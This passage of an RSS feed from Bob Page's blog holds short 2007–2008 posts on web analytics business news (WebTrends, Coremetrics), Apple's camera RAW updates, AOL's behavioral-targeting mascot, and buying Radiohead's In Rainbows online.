			<content:encoded><![CDATA[<p>Congrats to WebTrends who <a href="http://www.webtrends.com/AboutWebTrends/NewsRoom/NewsRoomArchive/2008/WebTrendsNamesFormerGoogleExecasCEO.aspx">announced their new CEO</a> today.  Dan Stickel is no stranger to the Internet, having done executive stints at Google and AltaVista.</p>
<p>The press release quotes Dan: &#8220;The web analytics market is forecast for nearly 20% growth in 2008, and the growth in enterprise marketing software is even greater.&#8221;  Looks like the gauntlet has been thrown &#8212; this looks like a CEO challenge to WebTrends to do better than 20% growth this year.</p>
<p>It&#8217;s great to see such a venerable player getting past the cloud of uncertainty.  I don&#8217;t know anything about WebTrends&#8217; plans, but given Dan&#8217;s recent past at Google, expect to see an emphasis on partners.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=aY0TgmG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=aY0TgmG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=CblW8jg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=CblW8jg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=aGDunhg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=aGDunhg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=PS1j40g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=PS1j40g" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/07/new-webtrends-ceo/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/07/new-webtrends-ceo/</feedburner:origLink></item>
		<item>
		<title>Email alerts and a look ahead</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/265454694/</link>
		<comments>http://bobpage.net/2008/04/06/email-alerts-and-a-look-ahead/#comments</comments>
		<pubDate>Mon, 07 Apr 2008 05:59:24 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/06/email-alerts-and-a-look-ahead/</guid>
		<description><![CDATA[Forgot to mention in the rush of Coremetrics funding last week, that WebTrends announced email alerts.  Gotta love the quote from Rand.  The press release might have the coolest URL I&#8217;ve seen in a while.  I&#8217;d like to see that in a web analytics report.
Every week the sleepy world of web analytics [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/04/screenshot-01-1.gif" height="39" width="160" border="0" align="right" hspace="4" vspace="4" alt="webtrends" title="webtrends" />Forgot to mention in the rush of Coremetrics funding last week, that WebTrends announced <a href="http://www.webtrends.com/AboutWebTrends/NewsRoom/NewsRoomArchive/2008/WebTrendsOpenArchitectureEnablesPartnerstoHelpCustomersDiscoverKeyWebAnalyticsTrafficChangesInRealTime.aspx">email alerts</a>.  Gotta love the quote from Rand.  The press release might have the coolest URL I&#8217;ve seen in a while.  I&#8217;d like to see that in a web analytics report.</p>
<p>Every week the sleepy world of web analytics has something interesting happening.  I can&#8217;t wait to see what gets the buzz this week.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=YMOlU6G"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=YMOlU6G" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=6OyQrmg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=6OyQrmg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=5Rx7tXg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=5Rx7tXg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=5Nym6Gg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=5Nym6Gg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/06/email-alerts-and-a-look-ahead/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/06/email-alerts-and-a-look-ahead/</feedburner:origLink></item>
		<item>
		<title>Coremetrics gets another $60M</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/264122534/</link>
		<comments>http://bobpage.net/2008/04/04/coremetrics-gets-another-60m/#comments</comments>
		<pubDate>Fri, 04 Apr 2008 17:55:24 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/04/coremetrics-gets-another-60m/</guid>
		<description><![CDATA[In case you missed it &#8212; Coremetrics announced today that they just landed another $60M in financing.
(How things have changed:  when Accrue did its IPO nine years ago, we raised something like $39M.  It just goes to show that there&#8217;s a lot of money available outside the public markets.)
Good for Coremetrics that their [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/04/coremetrics.gif" height="67" width="348" border="0" align="right" hspace="4" vspace="4" alt="Coremetrics logo" title="Coremetrics logo" />In case you missed it &#8212; Coremetrics announced today that <a href="http://www.coremetrics.com/company/2008/pr04_04_08_million_led.php">they just landed another $60M in financing</a>.</p>
<p>(How things have changed:  when Accrue did its IPO nine years ago, we raised something like $39M.  It just goes to show that there&#8217;s a lot of money available outside the public markets.)</p>
<p>Good for Coremetrics that their investors see enough demand to hand over such a large sum.  It certainly bucks the conventional wisdom that Coremetrics was slowly withering away &#8212; it should put new life into their deals and a new swagger in their walk. Reading the press release, I can imagine the message to investors:  we are not constrained by the market, the competition, or our technology: we need more feet on the street.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=nhE92SG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=nhE92SG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=fVmzS2g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=fVmzS2g" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=Nrb6f2g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=Nrb6f2g" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=lNrsbCg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=lNrsbCg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/04/coremetrics-gets-another-60m/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/04/coremetrics-gets-another-60m/</feedburner:origLink></item>
		<item>
		<title>Competition and Responsiveness</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/256093190/</link>
		<comments>http://bobpage.net/2008/03/22/competition-and-responsiveness/#comments</comments>
		<pubDate>Sat, 22 Mar 2008 15:43:55 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Mac]]></category>

		<category><![CDATA[Photography]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/03/22/competition-and-responsiveness/</guid>
		<description><![CDATA[When Apple&#8217;s Aperture arrived, it was the first tool especially aimed at photographers with extensive photo management needs.  While praised for its vision, photographers were frustrated that support for new cameras took such a long time, seemingly requiring updates to Mac OS itself.  In the meantime, Adobe&#8217;s Photoshop Lightroom offered quick support for [...]]]></description>
			<content:encoded><![CDATA[<p>When Apple&#8217;s <a href="http://www.apple.com/aperture/">Aperture</a> arrived, it was the first tool especially aimed at photographers with extensive photo management needs.  While praised for its vision, photographers were frustrated that support for new cameras took such a long time, seemingly requiring updates to Mac OS itself.  In the meantime, Adobe&#8217;s Photoshop <a href="http://www.adobe.com/products/photoshoplightroom/">Lightroom</a> offered quick support for new camera models, and it was one of the reasons many photographers switched over to Lightroom.</p>
<p>Now with the release of Mac OS X 10.5.2, and perhaps due to updates to iPhoto and Aperture, Apple is able to push new camera support much quicker than before:<br />
<img src="http://bobpage.net/wp-content/uploads/2008/03/raw-update.png" height="381" width="428" border="1" hspace="4" vspace="4" alt="Software Update" title="Software Update" /></p>
<p>Would we be seeing this kind of turnaround on new cameras without competition from Adobe?  Hard to say &#8212; but it&#8217;s clear that Apple heard the cries of its market and responded.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=SCC7gfF"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=SCC7gfF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=XJV195f"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=XJV195f" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=fPha9wf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=fPha9wf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=F0X4tVf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=F0X4tVf" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/03/22/competition-and-responsiveness/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/03/22/competition-and-responsiveness/</feedburner:origLink></item>
		<item>
		<title>The more things change…</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/255134029/</link>
		<comments>http://bobpage.net/2008/03/20/the-more-things-change/#comments</comments>
		<pubDate>Thu, 20 Mar 2008 20:32:43 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/03/20/the-more-things-change/</guid>
		<description><![CDATA[So I&#8217;m filling out the WAA Analytics survey, and get to the question where they want to know how many years of experience I have in the field.  Shocked to write down &#8220;12&#8243; &#8212; that&#8217;s crazy.  How far have we come?  I&#8217;m still listening to people talk about tracking users.
]]></description>
			<content:encoded><![CDATA[<p>So I&#8217;m filling out the WAA Analytics survey, and get to the question where they want to know how many years of experience I have in the field.  Shocked to write down &#8220;12&#8243; &#8212; that&#8217;s crazy.  How far have we come?  I&#8217;m still listening to people talk about tracking users.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=o0ImRHF"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=o0ImRHF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=4UjoG0f"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=4UjoG0f" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=3ZCts6f"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=3ZCts6f" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=olsQytf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=olsQytf" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/03/20/the-more-things-change/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/03/20/the-more-things-change/</feedburner:origLink></item>
		<item>
		<title>The Behavioral Targeting Penguin</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/249160613/</link>
		<comments>http://bobpage.net/2008/03/10/the-behavioral-targeting-penguin/#comments</comments>
		<pubDate>Mon, 10 Mar 2008 23:21:50 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<category><![CDATA[Ethics]]></category>

		<category><![CDATA[Notable]]></category>

		<category><![CDATA[Odd]]></category>

		<category><![CDATA[Privacy]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/03/10/the-behavioral-targeting-penguin/</guid>
		<description><![CDATA[Hi kids! Today the cute and cuddly Mr. Penguin from AOL will answer all your questions on behavioral targeting!  Isn&#8217;t he cute! Now you know that behavioral targeting is your friend!
Have a good day!  And a tip o&#8217;the cap to the Good People at AOL who keep Mr. Penguin in anchovies in return [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/03/screenshot-01.gif" height="180" width="205" border="0" hspace="4" vspace="4" alt="Behavioral Penguin" title="Behavioral Penguin" />Hi kids! Today the cute and cuddly <a href="http://bits.blogs.nytimes.com/2008/03/09/aol-brings-out-the-penguins-to-explain-ad-targeting-ok-saul-and-louise-post-with-article/">Mr. Penguin</a> from AOL will answer all your questions on behavioral targeting!  Isn&#8217;t he cute! Now you know that behavioral targeting is your friend!</p>
<p>Have a good day!  And a tip o&#8217;the cap to the Good People at AOL who keep Mr. Penguin in anchovies in return for a little education gig he does for them.</p>
<p>PS oh, and did you know that <a href="http://www.alleyinsider.com/2008/3/aol_tries_to_head_off_behavioral_targeting_storm_meet_mr_penguin">Google doesn&#8217;t track you around the web</a>?  Hahahahahahaha!</p>
<p>PPS Seriously, why doesn&#8217;t AOL focus on the benefits of BT &#8212; like that the ads you&#8217;ll get are actually <em>relevant</em>?  I am also concerned that they are confusing BT with tracking across an ad network.  They are not the same.  As it is, what I see from the storyboard is I get a TRACKING COOKIE ON MY COMPUTER followed closely by somebody thinking &#8220;I should remove that cookie&#8221;&#8230; is BT the new cookie?  Is the cookie the new cookie?</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=hCiMC6F"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=hCiMC6F" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=BDVUDLf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=BDVUDLf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=1WW3gLf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=1WW3gLf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=2yMMkOf"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=2yMMkOf" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/03/10/the-behavioral-targeting-penguin/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/03/10/the-behavioral-targeting-penguin/</feedburner:origLink></item>
		<item>
		<title>Roaring into the 2000s</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/180917792/</link>
		<comments>http://bobpage.net/2007/11/06/roaring-into-the-2000s/#comments</comments>
		<pubDate>Wed, 07 Nov 2007 05:09:23 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Music]]></category>

		<guid isPermaLink="false">http://bobpage.net/2007/11/06/roaring-into-the-2000s/</guid>
		<description><![CDATA[Today I bought my first digital-only “CD” online.

I have the iPhone, manage my music with iTunes, and all that.  But until today, I never actually purchased any music in digital-only format.  Maybe I&#8217;m just old-fashioned (or just old), but I like the physical medium.  I&#8217;m sure the recording industry wishes there were [...]]]></description>
			<content:encoded><![CDATA[<p>Today I bought my first digital-only “CD” online.<br />
<img src="http://bobpage.net/wp-content/uploads/2007/11/thomyorke.jpg" align="right" height="252" width="179" border="0" hspace="4" vspace="4" alt="Thom Yorke" title="Thom Yorke" /></p>
<p>I have the iPhone, manage my music with iTunes, and all that.  But until today, I never actually purchased any music in digital-only format.  Maybe I&#8217;m just old-fashioned (or just old), but I like the physical medium.  I&#8217;m sure the recording industry wishes there were more of me&#8230;</p>
<p>Today I read that <a href="http://news.yahoo.com/s/ap/20071106/ap_on_hi_te/radiohead_download_study"> Most fans paid $0 for Radiohead album</a>, and being a Radiohead fan, remembered I hadn&#8217;t heard “In Rainbows” yet.  So it&#8217;s off to the <a href="http://www.inrainbows.com/">Radiohead site</a>, and a few british pounds later, downloaded the “album”.</p>
<p>It&#8217;s ten songs in 160kbps MP3 format.  Not archival quality, for sure.  It comes with the basic ID3 tags mostly in place, except genre. But the songs themselves &#8212; the <em>music</em> &#8212; just fabulous.</p>
<p>Since there&#8217;s no cover art, I made my own, a screen snap from the <a href="http://www.inrainbows.com/">In Rainbows</a> site.  Because, you know, for <a href="http://en.wikipedia.org/wiki/Coverflow">Cover Flow</a>.<br />
<img src="http://bobpage.net/wp-content/uploads/2007/11/inrainbows.png" height="400" width="415" border="0" align="middle" hspace="0" vspace="4" alt="In Rainbows" title="In Rainbows" /></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=VrgfhTB"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=VrgfhTB" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=c2k3OUb"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=c2k3OUb" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=tAfRnOb"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=tAfRnOb" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=T7nQhgb"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=T7nQhgb" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2007/11/06/roaring-into-the-2000s/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2007/11/06/roaring-into-the-2000s/</feedburner:origLink></item>
	</channel>
</rss>
